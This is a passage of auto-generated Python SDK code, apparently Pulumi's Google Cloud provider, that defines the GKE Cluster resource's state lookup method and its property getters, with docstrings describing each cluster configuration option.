__props__.__dict__["master_authorized_networks_config"] = master_authorized_networks_config
__props__.__dict__["min_master_version"] = min_master_version
__props__.__dict__["monitoring_config"] = monitoring_config
__props__.__dict__["monitoring_service"] = monitoring_service
__props__.__dict__["name"] = name
__props__.__dict__["network"] = network
__props__.__dict__["network_policy"] = network_policy
__props__.__dict__["networking_mode"] = networking_mode
__props__.__dict__["node_config"] = node_config
__props__.__dict__["node_locations"] = node_locations
__props__.__dict__["node_pools"] = node_pools
__props__.__dict__["node_version"] = node_version
__props__.__dict__["notification_config"] = notification_config
__props__.__dict__["pod_security_policy_config"] = pod_security_policy_config
__props__.__dict__["private_cluster_config"] = private_cluster_config
__props__.__dict__["private_ipv6_google_access"] = private_ipv6_google_access
__props__.__dict__["project"] = project
__props__.__dict__["release_channel"] = release_channel
__props__.__dict__["remove_default_node_pool"] = remove_default_node_pool
__props__.__dict__["resource_labels"] = resource_labels
__props__.__dict__["resource_usage_export_config"] = resource_usage_export_config
__props__.__dict__["subnetwork"] = subnetwork
__props__.__dict__["vertical_pod_autoscaling"] = vertical_pod_autoscaling
__props__.__dict__["workload_identity_config"] = workload_identity_config
__props__.__dict__["endpoint"] = None
__props__.__dict__["label_fingerprint"] = None
__props__.__dict__["master_version"] = None
__props__.__dict__["operation"] = None
__props__.__dict__["self_link"] = None
__props__.__dict__["services_ipv4_cidr"] = None
__props__.__dict__["tpu_ipv4_cidr_block"] = None
super(Cluster, __self__).__init__(
'gcp:container/cluster:Cluster',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
addons_config: Optional[pulumi.Input[pulumi.InputType['ClusterAddonsConfigArgs']]] = None,
authenticator_groups_config: Optional[pulumi.Input[pulumi.InputType['ClusterAuthenticatorGroupsConfigArgs']]] = None,
cluster_autoscaling: Optional[pulumi.Input[pulumi.InputType['ClusterClusterAutoscalingArgs']]] = None,
cluster_ipv4_cidr: Optional[pulumi.Input[str]] = None,
cluster_telemetry: Optional[pulumi.Input[pulumi.InputType['ClusterClusterTelemetryArgs']]] = None,
confidential_nodes: Optional[pulumi.Input[pulumi.InputType['ClusterConfidentialNodesArgs']]] = None,
database_encryption: Optional[pulumi.Input[pulumi.InputType['ClusterDatabaseEncryptionArgs']]] = None,
datapath_provider: Optional[pulumi.Input[str]] = None,
default_max_pods_per_node: Optional[pulumi.Input[int]] = None,
default_snat_status: Optional[pulumi.Input[pulumi.InputType['ClusterDefaultSnatStatusArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
dns_config: Optional[pulumi.Input[pulumi.InputType['ClusterDnsConfigArgs']]] = None,
enable_autopilot: Optional[pulumi.Input[bool]] = None,
enable_binary_authorization: Optional[pulumi.Input[bool]] = None,
enable_intranode_visibility: Optional[pulumi.Input[bool]] = None,
enable_kubernetes_alpha: Optional[pulumi.Input[bool]] = None,
enable_l4_ilb_subsetting: Optional[pulumi.Input[bool]] = None,
enable_legacy_abac: Optional[pulumi.Input[bool]] = None,
enable_shielded_nodes: Optional[pulumi.Input[bool]] = None,
enable_tpu: Optional[pulumi.Input[bool]] = None,
endpoint: Optional[pulumi.Input[str]] = None,
identity_service_config: Optional[pulumi.Input[pulumi.InputType['ClusterIdentityServiceConfigArgs']]] = None,
initial_node_count: Optional[pulumi.Input[int]] = None,
ip_allocation_policy: Optional[pulumi.Input[pulumi.InputType['ClusterIpAllocationPolicyArgs']]] = None,
label_fingerprint: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
logging_config: Optional[pulumi.Input[pulumi.InputType['ClusterLoggingConfigArgs']]] = None,
logging_service: Optional[pulumi.Input[str]] = None,
maintenance_policy: Optional[pulumi.Input[pulumi.InputType['ClusterMaintenancePolicyArgs']]] = None,
master_auth: Optional[pulumi.Input[pulumi.InputType['ClusterMasterAuthArgs']]] = None,
master_authorized_networks_config: Optional[pulumi.Input[pulumi.InputType['ClusterMasterAuthorizedNetworksConfigArgs']]] = None,
master_version: Optional[pulumi.Input[str]] = None,
min_master_version: Optional[pulumi.Input[str]] = None,
monitoring_config: Optional[pulumi.Input[pulumi.InputType['ClusterMonitoringConfigArgs']]] = None,
monitoring_service: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
network: Optional[pulumi.Input[str]] = None,
network_policy: Optional[pulumi.Input[pulumi.InputType['ClusterNetworkPolicyArgs']]] = None,
networking_mode: Optional[pulumi.Input[str]] = None,
node_config: Optional[pulumi.Input[pulumi.InputType['ClusterNodeConfigArgs']]] = None,
node_locations: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
node_pools: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ClusterNodePoolArgs']]]]] = None,
node_version: Optional[pulumi.Input[str]] = None,
notification_config: Optional[pulumi.Input[pulumi.InputType['ClusterNotificationConfigArgs']]] = None,
operation: Optional[pulumi.Input[str]] = None,
pod_security_policy_config: Optional[pulumi.Input[pulumi.InputType['ClusterPodSecurityPolicyConfigArgs']]] = None,
private_cluster_config: Optional[pulumi.Input[pulumi.InputType['ClusterPrivateClusterConfigArgs']]] = None,
private_ipv6_google_access: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
release_channel: Optional[pulumi.Input[pulumi.InputType['ClusterReleaseChannelArgs']]] = None,
remove_default_node_pool: Optional[pulumi.Input[bool]] = None,
resource_labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
resource_usage_export_config: Optional[pulumi.Input[pulumi.InputType['ClusterResourceUsageExportConfigArgs']]] = None,
self_link: Optional[pulumi.Input[str]] = None,
services_ipv4_cidr: Optional[pulumi.Input[str]] = None,
subnetwork: Optional[pulumi.Input[str]] = None,
tpu_ipv4_cidr_block: Optional[pulumi.Input[str]] = None,
vertical_pod_autoscaling: Optional[pulumi.Input[pulumi.InputType['ClusterVerticalPodAutoscalingArgs']]] = None,
workload_identity_config: Optional[pulumi.Input[pulumi.InputType['ClusterWorkloadIdentityConfigArgs']]] = None) -> 'Cluster':
"""
Get an existing Cluster resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['ClusterAddonsConfigArgs']] addons_config: The configuration for addons supported by GKE.
Structure is documented below.
:param pulumi.Input[pulumi.InputType['ClusterAuthenticatorGroupsConfigArgs']] authenticator_groups_config: Configuration for the
[Google Groups for GKE](https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control#groups-setup-gsuite) feature.
Structure is documented below.
:param pulumi.Input[pulumi.InputType['ClusterClusterAutoscalingArgs']] cluster_autoscaling: Per-cluster configuration of Node Auto-Provisioning with Cluster Autoscaler to
automatically adjust the size of the cluster and create/delete node pools based
on the current needs of the cluster's workload. See the
[guide to using Node Auto-Provisioning](https://cloud.google.com/kubernetes-engine/docs/how-to/node-auto-provisioning)
for more details. Structure is documented below.
:param pulumi.Input[str] cluster_ipv4_cidr: The IP address range of the Kubernetes pods
in this cluster in CIDR notation (e.g. `10.96.0.0/14`). Leave blank to have one
automatically chosen or specify a `/14` block in `10.0.0.0/8`. This field will
only work for routes-based clusters, where `ip_allocation_policy` is not defined.
:param pulumi.Input[pulumi.InputType['ClusterClusterTelemetryArgs']] cluster_telemetry: Configuration for
[ClusterTelemetry](https://cloud.google.com/monitoring/kubernetes-engine/installing#controlling_the_collection_of_application_logs) feature,
Structure is documented below.
:param pulumi.Input[pulumi.InputType['ClusterConfidentialNodesArgs']] confidential_nodes: Configuration for [Confidential Nodes](https://cloud.google.com/kubernetes-engine/docs/how-to/confidential-gke-nodes) feature. Structure is documented below documented below.
:param pulumi.Input[pulumi.InputType['ClusterDatabaseEncryptionArgs']] database_encryption: Structure is documented below.
:param pulumi.Input[str] datapath_provider: The desired datapath provider for this cluster. By default, uses the IPTables-based kube-proxy implementation.
:param pulumi.Input[int] default_max_pods_per_node: The default maximum number of pods
per node in this cluster. This doesn't work on "routes-based" clusters, clusters
that don't have IP Aliasing enabled. See the [official documentation](https://cloud.google.com/kubernetes-engine/docs/how-to/flexible-pod-cidr)
for more information.
:param pulumi.Input[pulumi.InputType['ClusterDefaultSnatStatusArgs']] default_snat_status: [GKE SNAT](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-masquerade-agent#how_ipmasq_works) DefaultSnatStatus contains the desired state of whether default sNAT should be disabled on the cluster, [API doc](https://cloud.google.com/kubernetes-engine/docs/reference/rest/v1beta1/projects.locations.clusters#networkconfig). Structure is documented below
:param pulumi.Input[str] description: Description of the cluster.
:param pulumi.Input[pulumi.InputType['ClusterDnsConfigArgs']] dns_config: Configuration for [Using Cloud DNS for GKE](https://cloud.google.com/kubernetes-engine/docs/how-to/cloud-dns). Structure is documented below.
:param pulumi.Input[bool] enable_autopilot: Enable Autopilot for this cluster. Defaults to `false`.
Note that when this option is enabled, certain features of Standard GKE are not available.
See the [official documentation](https://cloud.google.com/kubernetes-engine/docs/concepts/autopilot-overview#comparison)
for available features.
:param pulumi.Input[bool] enable_binary_authorization: Enable Binary Authorization for this cluster.
If enabled, all container images will be validated by Google Binary Authorization.
:param pulumi.Input[bool] enable_intranode_visibility: Whether Intra-node visibility is enabled for this cluster. This makes same node pod to pod traffic visible for VPC network.
:param pulumi.Input[bool] enable_kubernetes_alpha: Whether to enable Kubernetes Alpha features for
this cluster. Note that when this option is enabled, the cluster cannot be upgraded
and will be automatically deleted after 30 days.
:param pulumi.Input[bool] enable_l4_ilb_subsetting: Whether L4ILB Subsetting is enabled for this cluster.
:param pulumi.Input[bool] enable_legacy_abac: Whether the ABAC authorizer is enabled for this cluster.
When enabled, identities in the system, including service accounts, nodes, and controllers,
will have statically granted permissions beyond those provided by the RBAC configuration or IAM.
Defaults to `false`
:param pulumi.Input[bool] enable_shielded_nodes: Enable Shielded Nodes features on all nodes in this cluster. Defaults to `true`.
:param pulumi.Input[bool] enable_tpu: Whether to enable Cloud TPU resources in this cluster.
See the [official documentation](https://cloud.google.com/tpu/docs/kubernetes-engine-setup).
:param pulumi.Input[str] endpoint: The IP address of this cluster's Kubernetes master.
:param pulumi.Input[pulumi.InputType['ClusterIdentityServiceConfigArgs']] identity_service_config: . Structure is documented below.
:param pulumi.Input[int] initial_node_count: The number of nodes to create in this
cluster's default node pool. In regional or multi-zonal clusters, this is the
number of nodes per zone. Must be set if `node_pool` is not set. If you're using
`container.NodePool` objects with no default node pool, you'll need to
set this to a value of at least `1`, alongside setting
`remove_default_node_pool` to `true`.
:param pulumi.Input[pulumi.InputType['ClusterIpAllocationPolicyArgs']] ip_allocation_policy: Configuration of cluster IP allocation for
VPC-native clusters. Adding this block enables [IP aliasing](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-aliases),
making the cluster VPC-native instead of routes-based. Structure is documented
below.
:param pulumi.Input[str] label_fingerprint: The fingerprint of the set of labels for this cluster.
:param pulumi.Input[str] location: The location (region or zone) in which the cluster
master will be created, as well as the default node location. If you specify a
zone (such as `us-central1-a`), the cluster will be a zonal cluster with a
single cluster master. If you specify a region (such as `us-west1`), the
cluster will be a regional cluster with multiple masters spread across zones in
the region, and with default node locations in those zones as well
:param pulumi.Input[pulumi.InputType['ClusterLoggingConfigArgs']] logging_config: Logging configuration for the cluster.
Structure is documented below.
:param pulumi.Input[str] logging_service: The logging service that the cluster should
write logs to. Available options include `logging.googleapis.com`(Legacy Stackdriver),
`logging.googleapis.com/kubernetes`(Stackdriver Kubernetes Engine Logging), and `none`. Defaults to `logging.googleapis.com/kubernetes`
:param pulumi.Input[pulumi.InputType['ClusterMaintenancePolicyArgs']] maintenance_policy: The maintenance policy to use for the cluster. Structure is
documented below.
:param pulumi.Input[pulumi.InputType['ClusterMasterAuthArgs']] master_auth: The authentication information for accessing the
Kubernetes master. Some values in this block are only returned by the API if
your service account has permission to get credentials for your GKE cluster. If
you see an unexpected diff unsetting your client cert, ensure you have the
`container.clusters.getCredentials` permission.
Structure is documented below.
:param pulumi.Input[pulumi.InputType['ClusterMasterAuthorizedNetworksConfigArgs']] master_authorized_networks_config: The desired
configuration options for master authorized networks. Omit the
nested `cidr_blocks` attribute to disallow external access (except
the cluster node IPs, which GKE automatically whitelists).
Structure is documented below.
:param pulumi.Input[str] master_version: The current version of the master in the cluster. This may
be different than the `min_master_version` set in the config if the master
has been updated by GKE.
:param pulumi.Input[str] min_master_version: The minimum version of the master. GKE
will auto-update the master to new versions, so this does not guarantee the
current master version--use the read-only `master_version` field to obtain that.
If unset, the cluster's version will be set by GKE to the version of the most recent
official release (which is not necessarily the latest version). Most users will find
the `container.get_engine_versions` data source useful - it indicates which versions
are available. If you intend to specify versions manually,
[the docs](https://cloud.google.com/kubernetes-engine/versioning-and-upgrades#specifying_cluster_version)
describe the various acceptable formats for this field.
:param pulumi.Input[pulumi.InputType['ClusterMonitoringConfigArgs']] monitoring_config: Monitoring configuration for the cluster.
Structure is documented below.
:param pulumi.Input[str] monitoring_service: The monitoring service that the cluster
should write metrics to.
Automatically send metrics from pods in the cluster to the Google Cloud Monitoring API.
VM metrics will be collected by Google Compute Engine regardless of this setting
Available options include
`monitoring.googleapis.com`(Legacy Stackdriver), `monitoring.googleapis.com/kubernetes`(Stackdriver Kubernetes Engine Monitoring), and `none`.
Defaults to `monitoring.googleapis.com/kubernetes`
:param pulumi.Input[str] name: The name of the cluster, unique within the project and
location.
:param pulumi.Input[str] network: The name or self_link of the Google Compute Engine
network to which the cluster is connected. For Shared VPC, set this to the self link of the
shared network.
:param pulumi.Input[pulumi.InputType['ClusterNetworkPolicyArgs']] network_policy: Configuration options for the
[NetworkPolicy](https://kubernetes.io/docs/concepts/services-networking/networkpolicies/)
feature. Structure is documented below.
:param pulumi.Input[str] networking_mode: Determines whether alias IPs or routes will be used for pod IPs in the cluster.
Options are `VPC_NATIVE` or `ROUTES`. `VPC_NATIVE` enables [IP aliasing](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-aliases),
and requires the `ip_allocation_policy` block to be defined. By default when this field is unspecified, GKE will create a `ROUTES`-based cluster.
:param pulumi.Input[pulumi.InputType['ClusterNodeConfigArgs']] node_config: Parameters used in creating the default node pool.
Generally, this field should not be used at the same time as a
`container.NodePool` or a `node_pool` block; this configuration
manages the default node pool, which isn't recommended to be used.
Structure is documented below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] node_locations: The list of zones in which the cluster's nodes
are located. Nodes must be in the region of their regional cluster or in the
same region as their cluster's zone for zonal clusters. If this is specified for
a zonal cluster, omit the cluster's zone.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ClusterNodePoolArgs']]]] node_pools: List of node pools associated with this cluster.
See container.NodePool for schema.
**Warning:** node pools defined inside a cluster can't be changed (or added/removed) after
cluster creation without deleting and recreating the entire cluster. Unless you absolutely need the ability
to say "these are the _only_ node pools associated with this cluster", use the
container.NodePool resource instead of this property.
:param pulumi.Input[str] node_version: The Kubernetes version on the nodes. Must either be unset
or set to the same value as `min_master_version` on create. Defaults to the default
version set by GKE which is not necessarily the latest version. This only affects
nodes in the default node pool. While a fuzzy version can be specified, it's
recommended that you specify explicit versions as the provider will see spurious diffs
when fuzzy versions are used. See the `container.get_engine_versions` data source's
`version_prefix` field to approximate fuzzy versions.
To update nodes in other node pools, use the `version` attribute on the node pool.
:param pulumi.Input[pulumi.InputType['ClusterNotificationConfigArgs']] notification_config: Configuration for the [cluster upgrade notifications](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-upgrade-notifications) feature. Structure is documented below.
:param pulumi.Input[pulumi.InputType['ClusterPodSecurityPolicyConfigArgs']] pod_security_policy_config: ) Configuration for the
[PodSecurityPolicy](https://cloud.google.com/kubernetes-engine/docs/how-to/pod-security-policies) feature.
Structure is documented below.
:param pulumi.Input[pulumi.InputType['ClusterPrivateClusterConfigArgs']] private_cluster_config: Configuration for [private clusters](https://cloud.google.com/kubernetes-engine/docs/how-to/private-clusters),
clusters with private nodes. Structure is documented below.
:param pulumi.Input[str] private_ipv6_google_access: The desired state of IPv6 connectivity to Google Services. By default, no private IPv6 access to or from Google Services (all access will be via IPv4).
:param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it
is not provided, the provider project is used.
:param pulumi.Input[pulumi.InputType['ClusterReleaseChannelArgs']] release_channel: Configuration options for the [Release channel](https://cloud.google.com/kubernetes-engine/docs/concepts/release-channels)
feature, which provide more control over automatic upgrades of your GKE clusters.
When updating this field, GKE imposes specific version requirements. See
[Selecting a new release channel](https://cloud.google.com/kubernetes-engine/docs/concepts/release-channels#selecting_a_new_release_channel)
for more details; the `container.get_engine_versions` datasource can provide
the default version for a channel. Note that removing the `release_channel`
field from your config will cause the provider to stop managing your cluster's
release channel, but will not unenroll it. Instead, use the `"UNSPECIFIED"`
channel. Structure is documented below.
:param pulumi.Input[bool] remove_default_node_pool: If `true`, deletes the default node
pool upon cluster creation. If you're using `container.NodePool`
resources with no default node pool, this should be set to `true`, alongside
setting `initial_node_count` to at least `1`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] resource_labels: The GCE resource labels (a map of key/value pairs) to be applied to the cluster.
:param pulumi.Input[pulumi.InputType['ClusterResourceUsageExportConfigArgs']] resource_usage_export_config: Configuration for the
[ResourceUsageExportConfig](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-usage-metering) feature.
Structure is documented below.
:param pulumi.Input[str] self_link: The server-defined URL for the resource.
:param pulumi.Input[str] services_ipv4_cidr: The IP address range of the Kubernetes services in this
cluster, in [CIDR](http://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing)
notation (e.g. `1.2.3.4/29`). Service addresses are typically put in the last
`/16` from the container CIDR.
:param pulumi.Input[str] subnetwork: The name or self_link of the Google Compute Engine
subnetwork in which the cluster's instances are launched.
:param pulumi.Input[str] tpu_ipv4_cidr_block: The IP address range of the Cloud TPUs in this cluster, in
[CIDR](http://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing)
notation (e.g. `1.2.3.4/29`).
:param pulumi.Input[pulumi.InputType['ClusterVerticalPodAutoscalingArgs']] vertical_pod_autoscaling: Vertical Pod Autoscaling automatically adjusts the resources of pods controlled by it.
Structure is documented below.
:param pulumi.Input[pulumi.InputType['ClusterWorkloadIdentityConfigArgs']] workload_identity_config: Workload Identity allows Kubernetes service accounts to act as a user-managed
[Google IAM Service Account](https://cloud.google.com/iam/docs/service-accounts#user-managed_service_accounts).
Structure is documented below.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ClusterState.__new__(_ClusterState)
__props__.__dict__["addons_config"] = addons_config
__props__.__dict__["authenticator_groups_config"] = authenticator_groups_config
__props__.__dict__["cluster_autoscaling"] = cluster_autoscaling
__props__.__dict__["cluster_ipv4_cidr"] = cluster_ipv4_cidr
__props__.__dict__["cluster_telemetry"] = cluster_telemetry
__props__.__dict__["confidential_nodes"] = confidential_nodes
__props__.__dict__["database_encryption"] = database_encryption
__props__.__dict__["datapath_provider"] = datapath_provider
__props__.__dict__["default_max_pods_per_node"] = default_max_pods_per_node
__props__.__dict__["default_snat_status"] = default_snat_status
__props__.__dict__["description"] = description
__props__.__dict__["dns_config"] = dns_config
__props__.__dict__["enable_autopilot"] = enable_autopilot
__props__.__dict__["enable_binary_authorization"] = enable_binary_authorization
__props__.__dict__["enable_intranode_visibility"] = enable_intranode_visibility
__props__.__dict__["enable_kubernetes_alpha"] = enable_kubernetes_alpha
__props__.__dict__["enable_l4_ilb_subsetting"] = enable_l4_ilb_subsetting
__props__.__dict__["enable_legacy_abac"] = enable_legacy_abac
__props__.__dict__["enable_shielded_nodes"] = enable_shielded_nodes
__props__.__dict__["enable_tpu"] = enable_tpu
__props__.__dict__["endpoint"] = endpoint
__props__.__dict__["identity_service_config"] = identity_service_config
__props__.__dict__["initial_node_count"] = initial_node_count
__props__.__dict__["ip_allocation_policy"] = ip_allocation_policy
__props__.__dict__["label_fingerprint"] = label_fingerprint
__props__.__dict__["location"] = location
__props__.__dict__["logging_config"] = logging_config
__props__.__dict__["logging_service"] = logging_service
__props__.__dict__["maintenance_policy"] = maintenance_policy
__props__.__dict__["master_auth"] = master_auth
__props__.__dict__["master_authorized_networks_config"] = master_authorized_networks_config
__props__.__dict__["master_version"] = master_version
__props__.__dict__["min_master_version"] = min_master_version
__props__.__dict__["monitoring_config"] = monitoring_config
__props__.__dict__["monitoring_service"] = monitoring_service
__props__.__dict__["name"] = name
__props__.__dict__["network"] = network
__props__.__dict__["network_policy"] = network_policy
__props__.__dict__["networking_mode"] = networking_mode
__props__.__dict__["node_config"] = node_config
__props__.__dict__["node_locations"] = node_locations
__props__.__dict__["node_pools"] = node_pools
__props__.__dict__["node_version"] = node_version
__props__.__dict__["notification_config"] = notification_config
__props__.__dict__["operation"] = operation
__props__.__dict__["pod_security_policy_config"] = pod_security_policy_config
__props__.__dict__["private_cluster_config"] = private_cluster_config
__props__.__dict__["private_ipv6_google_access"] = private_ipv6_google_access
__props__.__dict__["project"] = project
__props__.__dict__["release_channel"] = release_channel
__props__.__dict__["remove_default_node_pool"] = remove_default_node_pool
__props__.__dict__["resource_labels"] = resource_labels
__props__.__dict__["resource_usage_export_config"] = resource_usage_export_config
__props__.__dict__["self_link"] = self_link
__props__.__dict__["services_ipv4_cidr"] = services_ipv4_cidr
__props__.__dict__["subnetwork"] = subnetwork
__props__.__dict__["tpu_ipv4_cidr_block"] = tpu_ipv4_cidr_block
__props__.__dict__["vertical_pod_autoscaling"] = vertical_pod_autoscaling
__props__.__dict__["workload_identity_config"] = workload_identity_config
return Cluster(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="addonsConfig")
def addons_config(self) -> pulumi.Output['outputs.ClusterAddonsConfig']:
"""
The configuration for addons supported by GKE.
Structure is documented below.
"""
return pulumi.get(self, "addons_config")
@property
@pulumi.getter(name="authenticatorGroupsConfig")
def authenticator_groups_config(self) -> pulumi.Output['outputs.ClusterAuthenticatorGroupsConfig']:
"""
Configuration for the
[Google Groups for GKE](https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control#groups-setup-gsuite) feature.
Structure is documented below.
"""
return pulumi.get(self, "authenticator_groups_config")
@property
@pulumi.getter(name="clusterAutoscaling")
def cluster_autoscaling(self) -> pulumi.Output['outputs.ClusterClusterAutoscaling']:
"""
Per-cluster configuration of Node Auto-Provisioning with Cluster Autoscaler to
automatically adjust the size of the cluster and create/delete node pools based
on the current needs of the cluster's workload. See the
[guide to using Node Auto-Provisioning](https://cloud.google.com/kubernetes-engine/docs/how-to/node-auto-provisioning)
for more details. Structure is documented below.
"""
return pulumi.get(self, "cluster_autoscaling")
@property
@pulumi.getter(name="clusterIpv4Cidr")
def cluster_ipv4_cidr(self) -> pulumi.Output[str]:
"""
The IP address range of the Kubernetes pods
in this cluster in CIDR notation (e.g. `10.96.0.0/14`). Leave blank to have one
automatically chosen or specify a `/14` block in `10.0.0.0/8`. This field will
only work for routes-based clusters, where `ip_allocation_policy` is not defined.
"""
return pulumi.get(self, "cluster_ipv4_cidr")
@property
@pulumi.getter(name="clusterTelemetry")
def cluster_telemetry(self) -> pulumi.Output['outputs.ClusterClusterTelemetry']:
"""
Configuration for
[ClusterTelemetry](https://cloud.google.com/monitoring/kubernetes-engine/installing#controlling_the_collection_of_application_logs) feature,
Structure is documented below.
"""
return pulumi.get(self, "cluster_telemetry")
@property
@pulumi.getter(name="confidentialNodes")
def confidential_nodes(self) -> pulumi.Output['outputs.ClusterConfidentialNodes']:
"""
Configuration for [Confidential Nodes](https://cloud.google.com/kubernetes-engine/docs/how-to/confidential-gke-nodes) feature. Structure is documented below documented below.
"""
return pulumi.get(self, "confidential_nodes")
@property
@pulumi.getter(name="databaseEncryption")
def database_encryption(self) -> pulumi.Output['outputs.ClusterDatabaseEncryption']:
"""
Structure is documented below.
"""
return pulumi.get(self, "database_encryption")
@property
@pulumi.getter(name="datapathProvider")
def datapath_provider(self) -> pulumi.Output[str]:
"""
The desired datapath provider for this cluster. By default, uses the IPTables-based kube-proxy implementation.
"""
return pulumi.get(self, "datapath_provider")
@property
@pulumi.getter(name="defaultMaxPodsPerNode")
def default_max_pods_per_node(self) -> pulumi.Output[int]:
"""
The default maximum number of pods
per node in this cluster. This doesn't work on "routes-based" clusters, clusters
that don't have IP Aliasing enabled. See the [official documentation](https://cloud.google.com/kubernetes-engine/docs/how-to/flexible-pod-cidr)
for more information.
"""
return pulumi.get(self, "default_max_pods_per_node")
@property
@pulumi.getter(name="defaultSnatStatus")
def default_snat_status(self) -> pulumi.Output['outputs.ClusterDefaultSnatStatus']:
"""
[GKE SNAT](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-masquerade-agent#how_ipmasq_works) DefaultSnatStatus contains the desired state of whether default sNAT should be disabled on the cluster, [API doc](https://cloud.google.com/kubernetes-engine/docs/reference/rest/v1beta1/projects.locations.clusters#networkconfig). Structure is documented below
"""
return pulumi.get(self, "default_snat_status")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
Description of the cluster.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="dnsConfig")
def dns_config(self) -> pulumi.Output[Optional['outputs.ClusterDnsConfig']]:
"""
Configuration for [Using Cloud DNS for GKE](https://cloud.google.com/kubernetes-engine/docs/how-to/cloud-dns). Structure is documented below.
"""
return pulumi.get(self, "dns_config")
@property
@pulumi.getter(name="enableAutopilot")
def enable_autopilot(self) -> pulumi.Output[Optional[bool]]:
"""
Enable Autopilot for this cluster. Defaults to `false`.
Note that when this option is enabled, certain features of Standard GKE are not available.
See the [official documentation](https://cloud.google.com/kubernetes-engine/docs/concepts/autopilot-overview#comparison)
for available features.
"""
return pulumi.get(self, "enable_autopilot")
@property
@pulumi.getter(name="enableBinaryAuthorization")
def enable_binary_authorization(self) -> pulumi.Output[Optional[bool]]:
"""
Enable Binary Authorization for this cluster.
If enabled, all container images will be validated by Google Binary Authorization.
"""
return pulumi.get(self, "enable_binary_authorization")
@property
@pulumi.getter(name="enableIntranodeVisibility")
def enable_intranode_visibility(self) -> pulumi.Output[bool]:
"""
Whether Intra-node visibility is enabled for this cluster. This makes same node pod to pod traffic visible for VPC network.
"""
return pulumi.get(self, "enable_intranode_visibility")
@property
@pulumi.getter(name="enableKubernetesAlpha")
def enable_kubernetes_alpha(self) -> pulumi.Output[Optional[bool]]:
"""
Whether to enable Kubernetes Alpha features for
this cluster. Note that when this option is enabled, the cluster cannot be upgraded
and will be automatically deleted after 30 days.
"""
return pulumi.get(self, "enable_kubernetes_alpha")
@property
@pulumi.getter(name="enableL4IlbSubsetting")
def enable_l4_ilb_subsetting(self) -> pulumi.Output[Optional[bool]]:
"""
Whether L4ILB Subsetting is enabled for this cluster.
"""
return pulumi.get(self, "enable_l4_ilb_subsetting")
@property
@pulumi.getter(name="enableLegacyAbac")
def enable_legacy_abac(self) -> pulumi.Output[Optional[bool]]:
"""
Whether the ABAC authorizer is enabled for this cluster.
When enabled, identities in the system, including service accounts, nodes, and controllers,
will have statically granted permissions beyond those provided by the RBAC configuration or IAM.
Defaults to `false`
"""
return pulumi.get(self, "enable_legacy_abac")
@property
@pulumi.getter(name="enableShieldedNodes")
def enable_shielded_nodes(self) -> pulumi.Output[Optional[bool]]:
"""
Enable Shielded Nodes features on all nodes in this cluster. Defaults to `true`.
"""
return pulumi.get(self, "enable_shielded_nodes")
@property
@pulumi.getter(name="enableTpu")
def enable_tpu(self) -> pulumi.Output[Optional[bool]]:
"""
Whether to enable Cloud TPU resources in this cluster.
See the [official documentation](https://cloud.google.com/tpu/docs/kubernetes-engine-setup).
"""
return pulumi.get(self, "enable_tpu")
@property
@pulumi.getter
def endpoint(self) -> pulumi.Output[str]:
"""
The IP address of this cluster's Kubernetes master.
"""
return pulumi.get(self, "endpoint")
@property
@pulumi.getter(name="identityServiceConfig")
def identity_service_config(self) -> pulumi.Output['outputs.ClusterIdentityServiceConfig']:
"""
. Structure is documented below.
"""
return pulumi.get(self, "identity_service_config")
@property
@pulumi.getter(name="initialNodeCount")
def initial_node_count(self) -> pulumi.Output[Optional[int]]:
"""
The number of nodes to create in this
cluster's default node pool. In regional or multi-zonal clusters, this is the
number of nodes per zone. Must be set if `node_pool` is not set. If you're using
`container.NodePool` objects with no default node pool, you'll need to
set this to a value of at least `1`, alongside setting
`remove_default_node_pool` to `true`.
"""
return pulumi.get(self, "initial_node_count")
@property
@pulumi.getter(name="ipAllocationPolicy")
def ip_allocation_policy(self) -> pulumi.Output['outputs.ClusterIpAllocationPolicy']:
"""
Configuration of cluster IP allocation for
VPC-native clusters. Adding this block enables [IP aliasing](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-aliases),
making the cluster VPC-native instead of routes-based. Structure is documented
below.
"""
return pulumi.get(self, "ip_allocation_policy")
@property
@pulumi.getter(name="labelFingerprint")
def label_fingerprint(self) -> pulumi.Output[str]:
"""
The fingerprint of the set of labels for this cluster.
"""
return pulumi.get(self, "label_fingerprint")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
The location (region or zone) in which the cluster
master will be created, as well as the default node location. If you specify a
zone (such as `us-central1-a`), the cluster will be a zonal cluster with a
single cluster master. If you specify a region (such as `us-west1`), the
cluster will be a regional cluster with multiple masters spread across zones in
the region, and with default node locations in those zones as well
"""
return pulumi.get(self, "location")
@property
@pulumi.getter(name="loggingConfig")
def logging_config(self) -> pulumi.Output['outputs.ClusterLoggingConfig']:
"""
Logging configuration for the cluster.
Structure is documented below.
"""
return pulumi.get(self, "logging_config")
@property
